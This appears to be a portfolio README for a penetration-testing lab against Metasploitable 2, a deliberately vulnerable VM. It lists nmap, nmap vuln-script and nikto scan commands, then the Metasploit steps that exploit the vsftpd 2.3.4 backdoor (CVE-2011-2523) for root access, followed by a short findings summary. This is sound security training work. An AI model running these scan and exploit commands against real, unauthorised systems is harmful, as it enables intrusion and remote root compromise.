This project demonstrates a full penetration testing workflow on Metasploitable 2, a deliberately vulnerable VM.
The goal was to simulate a real-world Vulnerability Assessment and Penetration Test (VAPT) and produce a consultancy-style report.
- Scanned target IP for open ports and services
nmap -sV <target-ip> -oN nmap_scan.txt- Nmap vulnerability scripts
nmap -sV --script vuln <target-ip> -oN vuln_results.txt- Nikto web scan
nikto -h http://<target-ip> -output nikto_results.txt- Exploited vsftpd 2.3.4 backdoor (CVE-2011-2523)
msfconsole
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS <target-ip>
run- Verified root access with:
whoami- Documented findings, CVEs, and remediation
- Delivered a professional consultancy-style report (PDF)
📄 Full Report (PDF)
🖼️ Roadmap Infographic
📸 Proof Screenshots
- Kali Linux
- Nmap
- Nikto
- Metasploit Framework
- Critical: FTP backdoor (vsftpd 2.3.4 – CVE-2011-2523) → Remote root access
- High: Outdated Apache 2.2.8 & PHP 5.2.4
- Medium: Missing HTTP security headers
👤 Gufran Ahmed
🔗 LinkedIn
